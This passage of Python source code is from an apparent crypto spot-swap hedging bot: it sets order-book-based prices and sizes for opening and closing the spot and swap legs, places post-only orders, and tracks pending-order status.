if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] > (tolerate_limit / swap_present_price):
# While closing, the spot leg exceeds the swap leg and the spot sell is too slow: spot used to sell at the opposing price, changed 0607 to the mid price
if float(Operation_info[h]['spot_depth5'][0]['bids'][0][0]) + Necessary_info[h]['spot_tick_size'] < float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]):
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['spot_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['spot_tick_digit'])
else:
spot_close_price = precfloat((float(Operation_info[h]['spot_depth5'][0]['asks'][0][0])), Necessary_info[h]['spot_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': spot_close_price,
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][4][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': '0',
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*tolerate_limit / 2 / swap_present_price < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / 4 / swap_present_price):
# While closing, the swap leg exceeds the spot leg: speed up the swap buy-back at best and nudge the spot sell to level 2
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][2][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif -1*tolerate_limit / swap_present_price < Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*(tolerate_limit / 2 / swap_present_price):
# While closing, the swap leg exceeds the spot leg: speed up the swap buy-back at the mid price and sell spot at level 5
# If the swap best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
elif Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'] + Operation_info[h]['spot_balance'] < -1*tolerate_limit / swap_present_price:
# While closing, the swap leg exceeds the spot leg: the swap buy-back used to rest at the opposing price, changed 0607 to the mid price
# If the swap best ask - best bid > one tick, the mid can be posted; otherwise post at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][4][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': swap_close_price,
'spot_close_size': '0',
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
else: # default case: sell the spot long and buy back the swap short, both resting at best
mode_take_close_long_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'spot_instrument_id': Necessary_info[h]['spot_instrument_id'],
'spot_close_price': precfloat(float(Operation_info[h]['spot_depth5'][0]['asks'][0][0]), Necessary_info[h]['spot_tick_digit']),
'swap_close_price': precfloat(float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]), Necessary_info[h]['swap_tick_digit']),
'spot_close_size': spot_close_size,
'swap_close_size': swap_close_size,
'spot_order_type': 'post_only',
'swap_order_type': 'post_only'}
if open_long_final_open_mode == 'on': # the swap keeps opening its short; swap_position<0, spot_balance>0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot is close to Target_Amount, swap is in open_long_final_open_mode, current gap is ' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + ' USD'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size=int(Necessary_info[h]['swap_min_size'])
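# Residual sizing: the outstanding coin gap |spot_balance + swap_position * contract_val| is converted
# to contracts by dividing by contract_val and truncating to an int, with swap_min_size as the floor.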
# If the swap best ask - best bid > one tick, the mid can be posted; otherwise post at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size']< float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_long_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, # posted at the mid (or best) price
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_short_final_open_mode == 'on': # the swap keeps opening its long; swap_position>0, spot_balance<0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot is close to Target_Amount, swap is in open_short_final_open_mode, current gap is ' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + ' USD'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try opening the long at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_short_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, #买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_long_final_close_mode == 'on': # swap position exceeds spot, need to close shorts; swap_position<0, spot_balance>0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_long_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * \
Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h][
'contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(
Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try closing the short (buying) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_long_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, # 买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if open_short_final_close_mode == 'on': # swap position exceeds spot, need to close longs; swap_position>0, spot_balance<0
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount,swap是open_short_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] +Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) >= Necessary_info[h]['swap_min_size'] * \
Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h][
'contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_size = int(abs(
Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] *
Necessary_info[h]['contract_val']) / Necessary_info[h]['contract_val'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_size = int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try closing the long (selling) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_open_short_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_price': swap_price, # 买在best价
'swap_size': swap_size,
'swap_order_type': 'post_only'}
if close_long_final_close_mode == 'on': # spot long is closed; swap keeps closing its short, buying at the counterparty price
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_long_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try closing the short (buying) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_short_final_close_mode == 'on': # swap keeps closing its long,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_short_final_close_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try closing the long (selling) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_final_close_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_long_final_open_mode == 'on': # swap keeps opening shorts,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try opening the short (selling) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best ask
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_long_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
if close_short_final_open_mode == 'on': # swap opens longs,
tutu = Necessary_info[h]['swap_instrument_id'] + ":" + 'spot已接近Target_Amount_Close,swap是close_final_open_mode,现在相差' + \
str((Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) * swap_present_price) + '美金'
# sendmessage(tutu)
if abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])>= Necessary_info[h]['swap_min_size']* Necessary_info[h]['contract_val']:
if int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val']) > int(Necessary_info[h]['swap_min_size']):
swap_close_size=int(abs(Operation_info[h]['spot_balance']+Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])/Necessary_info[h]['contract_val'])
else:
swap_close_size = int(Necessary_info[h]['swap_min_size'])
else:
swap_close_size=int(Necessary_info[h]['swap_min_size'])
# Fills were slow, so try opening the long (buying) at the counterparty price (changed 06/07: quote at the mid price)
# If swap best ask - best bid > 1 tick_size there is room to quote inside the spread; otherwise quote at the best bid
if float(Operation_info[h]['swap_depth5'][0]['bids'][0][0]) + Necessary_info[h]['swap_tick_size'] < float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]):
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['asks'][0][0]) + float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])) / 2, Necessary_info[h]['swap_tick_digit'])
else:
swap_close_price = precfloat((float(Operation_info[h]['swap_depth5'][0]['bids'][0][0])), Necessary_info[h]['swap_tick_digit'])
mode_take_close_short_final_open_order = {'swap_instrument_id': Necessary_info[h]['swap_instrument_id'],
'swap_close_price': swap_close_price, # 买在best价
'swap_close_size': swap_close_size,
'swap_order_type': 'post_only'}
#print('funding_rate_result_1',funding_rate_result)
if open_long_mode == 'on':
# Place orders: buy spot, sell swap
spot_order_result, swap_order_result = take_long_order(mode_take_long_order)
time.sleep(0.1)
if spot_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_order_result != 'none':
if int(spot_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
# count how many spot buy orders have been placed
Operation_info[h]['spot_buy_trading_orders']=Operation_info[h]['spot_buy_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_order_result !='none':
if int(swap_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
# if h=='SWRV-USDT':
# print('open_long_spot_order_result',spot_order_result)
# print('open_long_swap_order_result',swap_order_result)
# print('spot_pending_list_left_open_long',Operation_info[h]['spot_pending_list_left'])
# print('swap_pending_list_left_open_long', Operation_info[h]['swap_pending_list_left'])
if open_short_mode == 'on':
# Place orders: buy swap, sell spot
spot_order_result, swap_order_result = take_short_order(mode_take_short_order)
time.sleep(0.1)
if spot_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_order_result != 'none':
if int(spot_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
# count how many spot sell orders have been placed
Operation_info[h]['spot_sell_trading_orders']=Operation_info[h]['spot_sell_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_order_result !='none':
if int(swap_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
#print('open_short_spot_order_result', spot_order_result)
#print('open_short_swap_order_result', swap_order_result)
#print('spot_pending_list_left_open_long', Operation_info[h]['spot_pending_list_left'])
#print('swap_pending_list_left_open_long', Operation_info[h]['swap_pending_list_left'])
if close_long_mode == 'on':
# Sell spot, buy swap
spot_close_order_result, swap_close_order_result = take_close_long_order(mode_take_close_long_order)
time.sleep(0.1)
if spot_close_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_close_order_result != 'none':
if int(spot_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
# count how many spot sell orders have been placed
Operation_info[h]['spot_sell_trading_orders']=Operation_info[h]['spot_sell_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_close_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_close_order_result !='none':
if int(swap_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
if close_short_mode == 'on':
# Buy spot, sell swap
spot_close_order_result, swap_close_order_result = take_close_short_order(mode_take_close_short_order)
time.sleep(0.1)
if spot_close_order_result == 'none':
Operation_info[h]['spot_pending_list_left'] = 'off'
elif spot_close_order_result != 'none':
if int(spot_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['spot_pending_list_left'] = 'on'
# count how many spot buy orders have been placed
Operation_info[h]['spot_buy_trading_orders']=Operation_info[h]['spot_buy_trading_orders']+1
else:
Operation_info[h]['spot_pending_list_left'] = 'off'
if swap_close_order_result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif swap_close_order_result !='none':
if int(swap_close_order_result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
#print('spot_close_short_order_result_334', spot_close_order_result)
#print('swap_close_short_order_result_334', swap_close_order_result)
#print('spot_pending_list_left_open_long_334', Operation_info[h]['spot_pending_list_left'])
#print('swap_pending_list_left_open_long_334', Operation_info[h]['swap_pending_list_left'])
if open_long_final_open_mode == 'on':
# Place order: sell swap
result = take_open_long_final_open_order(mode_take_open_long_final_open_order)
time.sleep(0.1)
#print('mode_take_open_long_final_open_order',mode_take_open_long_final_open_order)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_short_final_open_mode == 'on':
# Place order: buy swap
result = take_open_short_final_open_order(mode_take_open_short_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_long_final_close_mode == 'on':
# Place order: buy swap
result = take_open_long_final_close_order(mode_take_open_long_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if open_short_final_close_mode == 'on':
# Place order: sell swap
result = take_open_short_final_close_order(mode_take_open_short_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_long_final_close_mode == 'on':
# Place order
result = take_close_long_final_close_order(mode_take_close_long_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_short_final_close_mode == 'on':
# Place order: sell swap
result = take_close_short_final_close_order(mode_take_close_short_final_close_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_long_final_open_mode == 'on':
# Place order
result = take_close_long_final_open_order(mode_take_close_long_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap sell orders have been placed
Operation_info[h]['swap_sell_trading_orders']=Operation_info[h]['swap_sell_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
Operation_info[h]['spot_pending_list_left'] = 'off'
if close_short_final_open_mode == 'on':
# Place order
result = take_close_short_final_open_order(mode_take_close_short_final_open_order)
time.sleep(0.1)
if result == 'none':
Operation_info[h]['swap_pending_list_left'] = 'off'
elif result != 'none':
if int(result['data'][0]['sCode'])==0:
Operation_info[h]['swap_pending_list_left'] = 'on'
# count how many swap buy orders have been placed
Operation_info[h]['swap_buy_trading_orders'] = Operation_info[h]['swap_buy_trading_orders']+1
else:
Operation_info[h]['swap_pending_list_left'] = 'off'
